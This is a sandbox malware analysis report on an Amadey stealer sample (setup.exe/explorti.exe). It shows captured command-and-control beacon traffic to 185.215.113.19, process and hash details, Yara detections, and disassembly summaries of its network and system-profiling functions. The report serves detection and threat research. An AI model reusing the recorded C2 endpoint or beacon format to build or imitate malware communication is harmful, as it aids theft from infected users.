Jul 26, 2024 21:05:02.575953960 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:05:02.576189995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:05:02.578614950 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:05:02.837013006 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	56772	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:05:02.953674078 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:05:03.708009958 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	56773	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:05:03.723368883 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:05:04.498737097 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	56774	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:05:04.629357100 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:05:05.432271957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:05:05.435864925 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:05:05.689827919 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	56775	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:05:05.828634024 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:05:06.668731928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	56776	185.215.113.19	80	5616	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:05:06.678340912 CEST	312	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 26, 2024 21:05:07.445532084 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:05:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	15:03:01
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\setup.exe"
Imagebase:	0xc20000
File size:	1'971'200 bytes
MD5 hash:	F6DCA815EB37C8AA9BA54C603624227B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2184897638.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2141203577.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:03:05
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x2b0000
File size:	1'971'200 bytes
MD5 hash:	F6DCA815EB37C8AA9BA54C603624227B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2228974412.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2188519642.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:03:05
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Imagebase:	0x2b0000
File size:	1'971'200 bytes
MD5 hash:	F6DCA815EB37C8AA9BA54C603624227B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2189691685.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2230067978.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:04:00
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x2b0000
File size:	1'971'200 bytes
MD5 hash:	F6DCA815EB37C8AA9BA54C603624227B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.2724598095.0000000005300000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 04DF0DD8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2192014040.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5664c164c38129d201c810f310824fabbcf628b12fe89558a9e646925a6ce460
Instruction ID: 0b2c667394a1217d67bee6659832e7497e81d7f72c352b1f2736e2f2a7c31ca4
Opcode Fuzzy Hash: 5664c164c38129d201c810f310824fabbcf628b12fe89558a9e646925a6ce460
Instruction Fuzzy Hash: D4C0126B748015DA40B2614669151767A25B15B3323774503F1C7DB543B289E568B121

Function 04DF0DD5 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2192014040.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bfd5e0e55178f43c8e67563f78b3d56e2ce57e82cfce23d989beb311de8a473
Instruction ID: 9508dff32a5c44f61844ae30c23f0164e30ece4f2481e4a63b113746980e42b3
Opcode Fuzzy Hash: 4bfd5e0e55178f43c8e67563f78b3d56e2ce57e82cfce23d989beb311de8a473
Instruction Fuzzy Hash: 8BC02222714114D3407224021C564327E08711B3213234902B2C3DF943F20CE890B011

Non-executed Functions

Function 04DF04DA Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2192014040.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aea2dc7af2db5952bc924f4f8f7857b03b28f50c46d7cfa0a68fa9666cf34cd5
Instruction ID: eac6ba68c018620843c330e7bc322e80672b3d359818ae1ae779fe8ebd4ede18
Opcode Fuzzy Hash: aea2dc7af2db5952bc924f4f8f7857b03b28f50c46d7cfa0a68fa9666cf34cd5
Instruction Fuzzy Hash: 48E0B6EB2891143DF01194823F14AF7A77DD2D2B30731C937F402D5846D2D50A4E6071

Analysis Process: explorti.exePID: 5616, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.2%
Total number of Nodes:	610
Total number of Limit Nodes:	41

Executed Functions

Function 002BBD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00308D68,00000000,00000000,00000000,00000000), ref: 002BBDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 002BBE11
HttpOpenRequestA.WININET(?,00000000), ref: 002BBE5B
HttpSendRequestA.WININET(?,00000000), ref: 002BBF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 002BBFCD
InternetCloseHandle.WININET(?), ref: 002BC0A7
InternetCloseHandle.WININET(?), ref: 002BC0AF
InternetCloseHandle.WININET(?), ref: 002BC0B7

Strings

invalid stoi argument, xrefs: 002BE404
PoPn, xrefs: 002BD516
6JLUcBRYEz9=, xrefs: 002BC385
stoi argument out of range, xrefs: 002BE3FA
PG3NVu==, xrefs: 002BBE33
6JLUcxtnEx==, xrefs: 002BC2EB, 002BC543
d41, xrefs: 002BE2FF

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$d41$invalid stoi argument$stoi argument out of range
API String ID: 688256393-1161962885
Opcode ID: 106146e5bee25d04d3153af46ebc1718ab4a19721e8a7cdba946dbe6d586e94e
Instruction ID: f2ed1d4a74ccb30deedfdc9a2a7ee43662bc95ec1cf2c1227807dc5ce35921a7
Opcode Fuzzy Hash: 106146e5bee25d04d3153af46ebc1718ab4a19721e8a7cdba946dbe6d586e94e
Instruction Fuzzy Hash: F5B1F4B16201189BEB28DF28CC85BEEBB79EF45344F5042A9F508972C2D7719AD0CF95

Function 002B65B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 002B6650

Strings

EUVmdK==, xrefs: 002B66F8
GUPmdK==, xrefs: 002B67A1
PAUfbBZl, xrefs: 002B666C

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: EUVmdK==$GUPmdK==$PAUfbBZl
API String ID: 1484870144-2376134257
Opcode ID: 20d6c3060acf53fc8ebc58b0df42fdb2393bc754a8a4f4395353aaf41026d12b
Instruction ID: f1c0cf435b2768983f924906846c48e42da9b109627e1b0c9176ce99ce81c71f
Opcode Fuzzy Hash: 20d6c3060acf53fc8ebc58b0df42fdb2393bc754a8a4f4395353aaf41026d12b
Instruction Fuzzy Hash: CB91C2B19101189BDB28DF24CC89BEDB779EF49344F4046EDE50997282DA349BD8CFA4

Function 002C46C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 002C7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002C795C
Part of subcall function 002C7870: __Cnd_destroy_in_situ.LIBCPMT ref: 002C7968
Part of subcall function 002C7870: __Mtx_destroy_in_situ.LIBCPMT ref: 002C7971

Part of subcall function 002BBD60: InternetOpenW.WININET(00308D68,00000000,00000000,00000000,00000000), ref: 002BBDED
Part of subcall function 002BBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 002BBE11
Part of subcall function 002BBD60: HttpOpenRequestA.WININET(?,00000000), ref: 002BBE5B

std::_Xinvalid_argument.LIBCPMT ref: 002C4EA2

Strings

Toe0, xrefs: 002C5447
75G0, xrefs: 002C5470
KIG+, xrefs: 002C4776, 002C47ED, 002C4A95, 002C4B0C
7470, xrefs: 002C531D
6YK0, xrefs: 002C5502
84K0, xrefs: 002C5497
8lU=, xrefs: 002C6383, 002C6652
8IG0, xrefs: 002C53F5
IEYUMK==, xrefs: 002C54B9
TZS0, xrefs: 002C537A
Dy==, xrefs: 002C369E, 002C4D2D
9pG0, xrefs: 002C54DB
TZC0, xrefs: 002C541E
246122658369, xrefs: 002C4F4D, 002C4F8F, 002C4F99, 002C54F4
KIK+, xrefs: 002C47BD, 002C48EC, 002C4ADC, 002C4C0B
85K3cq==, xrefs: 002C4712
stoi argument out of range, xrefs: 002C4269, 002C4EAC
UIU0, xrefs: 002C53A3
-1, xrefs: 002C4F3A
9YY0, xrefs: 002C53CC
0657d1, xrefs: 002C5489
7JS0, xrefs: 002C5351

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range$-1
API String ID: 2414744145-991459688
Opcode ID: 83fdafec3538e1bdc4e722328826c7eb6f2db849a38ca13d1400895957263612
Instruction ID: d9813221f3e774224b334203033a395cc99a1959e998a12766df36d2d605f74d
Opcode Fuzzy Hash: 83fdafec3538e1bdc4e722328826c7eb6f2db849a38ca13d1400895957263612
Instruction Fuzzy Hash: 632325709201589BEB19DB28CD89B9DBB769F85304F5482DCE009AB2C2DB359FE4CF51

Function 002B5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 002B600A
00000422, xrefs: 002B5FD9
00000419, xrefs: 002B5FA8
Keyboard Layout\Preload, xrefs: 002B5F64
0000043f, xrefs: 002B603B

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 1e9bb429261493f1c7ef1dbc5a0424fdc6d5ffa40929268274108e35c02ea1a0
Instruction ID: 9cf1acf4d79d3316d21df3c77ebe7f6a9b7cbeea078fde521461a984c00549a4
Opcode Fuzzy Hash: 1e9bb429261493f1c7ef1dbc5a0424fdc6d5ffa40929268274108e35c02ea1a0
Instruction Fuzzy Hash: 53E19C71910218ABEB25DFA4CC8DBEEB779EB04340F5042D9E508A7291D7749BD4CF91

Function 002B7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002B7EA3

Strings

HlurOK==, xrefs: 002B8062
HlusMa==, xrefs: 002B810A
HlurNa==, xrefs: 002B81B2

Memory Dump Source

Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File

